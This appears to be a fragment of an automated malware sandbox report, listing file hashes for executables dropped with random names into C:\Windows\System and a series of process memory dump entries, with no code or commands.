SHA512 8719db0aaa0805afaf6c4afd1949a6197a07a7e81bd5cb6841e944975b5ed46071cbf6725e29c935039b321f9d317cf5998c40136decfa0bd20500c396c71f40

C:\Windows\System\JUVJTSc.exe

MD5 21726b6dfd9875eb3fe6470cce83ce6a
SHA1 24e3bb5e071fdceb611a06072443fbd16206eafb
SHA256 6be7406b6e1051aa6751e086f84a8552c4e1d2e40a384bd2dd513366de84260a
SHA512 9461807a041871b61c9759f3ba1ce0abae634377bf1b25bc7d7463e010db3c0d556a7bb42eaa14405b70283a9db1415aea4a2e0679a876a0e5a91bc944e590d0

C:\Windows\System\cCYSZvE.exe

MD5 6748bd4ade480e7c628da66047e038b0
SHA1 a758fd702f1dd8bbad5d5ea0ebff6ce9ccdf735a
SHA256 56dbaa139b7799e782d7f54d09f890a4669662fce997b643fcb8a9fd0362f517
SHA512 7a93adbf417f7ee2f923df58ba8bef0a120aa8245b7a8b3bdce505b6ebeca6f1780426fb716e6a4f2f9921f724f0fd978b7fee5f08861b5b8d0f8b571a944bb0

memory/872-571-0x00007FF76BF30000-0x00007FF76C322000-memory.dmp

memory/1960-1005-0x00007FF75E5E0000-0x00007FF75E9D2000-memory.dmp

memory/1112-968-0x00007FF6C52B0000-0x00007FF6C56A2000-memory.dmp

memory/3596-966-0x00007FF72B850000-0x00007FF72BC42000-memory.dmp

memory/2320-909-0x00007FF72F7F0000-0x00007FF72FBE2000-memory.dmp

memory/2088-1339-0x00007FF68EA60000-0x00007FF68EE52000-memory.dmp

memory/4924-1444-0x00007FF6D7E10000-0x00007FF6D8202000-memory.dmp

memory/1712-1436-0x00007FF6EB470000-0x00007FF6EB862000-memory.dmp

memory/3516-1471-0x00007FF688A30000-0x00007FF688E22000-memory.dmp

memory/2992-1497-0x00007FF6903E0000-0x00007FF6907D2000-memory.dmp

memory/988-1546-0x00007FF7A3820000-0x00007FF7A3C12000-memory.dmp

memory/872-1569-0x00007FF76BF30000-0x00007FF76C322000-memory.dmp

memory/4948-1568-0x00007FF7F1680000-0x00007FF7F1A72000-memory.dmp

memory/1144-1690-0x00007FF6734F0000-0x00007FF6738E2000-memory.dmp

memory/3128-1818-0x00007FF652EB0000-0x00007FF6532A2000-memory.dmp

memory/4860-1866-0x00007FF7F9020000-0x00007FF7F9412000-memory.dmp

memory/220-1916-0x00007FF6226A0000-0x00007FF622A92000-memory.dmp

memory/3184-1826-0x00007FF6128C0000-0x00007FF612CB2000-memory.dmp

memory/2340-1822-0x00007FF6CA5C0000-0x00007FF6CA9B2000-memory.dmp

memory/2656-1684-0x00007FF6A2370000-0x00007FF6A2762000-memory.dmp

memory/720-1681-0x00007FF735900000-0x00007FF735CF2000-memory.dmp

memory/2456-1693-0x00007FF7272B0000-0x00007FF7276A2000-memory.dmp

memory/1832-1937-0x00007FF778210000-0x00007FF778602000-memory.dmp

memory/4332-1936-0x00007FF7E0750000-0x00007FF7E0B42000-memory.dmp

memory/4500-1935-0x00007FF628AC0000-0x00007FF628EB2000-memory.dmp